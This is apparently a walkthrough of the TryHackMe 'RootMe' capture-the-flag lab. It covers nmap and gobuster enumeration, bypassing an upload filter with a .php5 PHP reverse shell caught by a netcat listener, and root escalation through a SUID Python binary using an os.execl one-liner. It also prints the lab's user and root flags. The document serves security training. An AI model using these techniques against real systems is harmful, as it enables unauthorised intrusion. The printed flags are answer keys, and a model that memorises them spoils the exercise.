In this walkthrough, we demonstrated how to exploit a vulnerable machine on TryHackMe. Starting with scanning for open ports, we identified key services running on the machine, such as SSH and Apache. By enumerating directories and uploading a PHP reverse shell, we gained access to the system. From there, we performed privilege escalation using a SUID binary, allowing us to gain root access and retrieve the root flag. This exercise showcases the importance of enumeration, exploiting common web application vulnerabilities, and leveraging misconfigurations like SUID permissions for privilege escalation.
Scan the Machine, How Many Ports Are Open?
We start by scanning the machine using Nmap to identify open ports. From the scan, we can see two open ports:
- Port 22: SSH (Secure Shell)
- Port 80: HTTP (Web Server)
Here’s the output from the Nmap scan:
$ nmap -sC -sV -A 10.10.112.113
Starting Nmap 7.80 ( https://nmap.org ) at 2024-11-26 12:45 CEST
Nmap scan report for 10.10.112.113
Host is up (0.048s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Answer: 2 open ports
This shows that the machine is running an SSH service on port 22 and a web server (Apache) on port 80.
What Version of Apache is Running?
From the Nmap scan, we can see that Apache is running version 2.4.29. This is important because certain versions of Apache may have known vulnerabilities that we can exploit.
What Service is Running on Port 22?
Port 22 is open and running the SSH service, which is used for remote secure communication with the server. We can potentially use this for further exploitation once we gain the necessary credentials.
Find Directories on the Web Server Using GoBuster
Next, we enumerate directories on the web server using GoBuster. This tool helps to find hidden directories that aren’t immediately visible. After running it with the common wordlist, we discover two interesting directories: /panel and /uploads.
kali@kali:/data/RootMe$ gobuster dir -u http://10.10.112.113 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.112.113
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2024/11/26 12:52:48 Starting gobuster
===============================================================
/index.php (Status: 200)
/panel (Status: 301)
/uploads (Status: 301)
===============================================================
2024/11/26 12:53:33 Finished
===============================================================
Answer: /panel/ is a hidden directory.
The /panel directory is worth investigating further, as it may lead us to a login page or other vulnerabilities.
Getting a Reverse Shell
To gain a reverse shell, we attempt to upload a PHP file. Initially, the system blocks .php file uploads, but we find that uploading a .php5 file bypasses the filter. We upload a PHP reverse shell and set up a listener on our attacker machine:
nc -nlvp 4444curl http://10.10.112.113/uploads/shell.php5We get a connection back, and we now have a shell as the www-data user:
kali@kali:/data/RootMe/files$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.72.113] from (UNKNOWN) [10.10.112.113] 34592
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Retrieve User Flag
After getting a shell, we navigate to /var/www to find the user flag:
$ cd /var/www
$ ls -la
total 20
drwxr-xr-x 3 www-data www-data 4096 Aug 4 17:54 .
drwxr-xr-x 14 root root 4096 Aug 4 15:08 ..
-rw------- 1 www-data www-data 129 Aug 4 17:54 .bash_history
drwxr-xr-x 6 www-data www-data 4096 Aug 4 17:19 html
-rw-r--r-- 1 www-data www-data 21 Aug 4 17:30 user.txt
$ cat user.txt
THM{y0u_g0t_a_sh3ll}
Answer: THM{y0u_g0t_a_sh3ll}
The user flag confirms we have gained access to the system as the www-data user.
Privilege Escalation
We now focus on escalating our privileges from the www-data user to root.
Searching for Files with SUID Permission
We search for files with the SUID (Set User ID) bit set, which can potentially allow us to run programs with elevated privileges. We find that /usr/bin/python is one such file:
bash-4.4$ find / -type f -user root -perm -u=s 2>/dev/null
/usr/bin/pythonAnswer: /usr/bin/python
This is a crucial finding. SUID files allow users to execute them with the permissions of the file owner, in this case, root.
Escalating Privileges Using Python
We can leverage Python to escalate our privileges. Using Python’s ability to execute commands, we can run a shell with root privileges:
bash-4.4$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
At this point, we have successfully escalated our privileges to root.
Getting the Root Flag
Finally, we navigate to the /root directory, where the root flag is located:
# cd /root
# ls -la
total 40
drwx------ 6 root root 4096 Aug 4 17:54 .
drwxr-xr-x 24 root root 4096 Aug 4 14:54 ..
-rw------- 1 root root 1423 Aug 4 17:54 .bash_history
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Aug 4 17:08 .cache
drwx------ 3 root root 4096 Aug 4 17:08 .gnupg
drwxr-xr-x 3 root root 4096 Aug 4 16:26 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 Aug 4 15:03 .ssh
-rw-r--r-- 1 root root 26 Aug 4 17:31 root.txt
# cat root.txt
THM{pr1v1l3g3_3sc4l4t10n}
Answer: THM{pr1v1l3g3_3sc4l4t10n}
We have successfully captured the root flag, completing the RootMe TryHackMe machine.
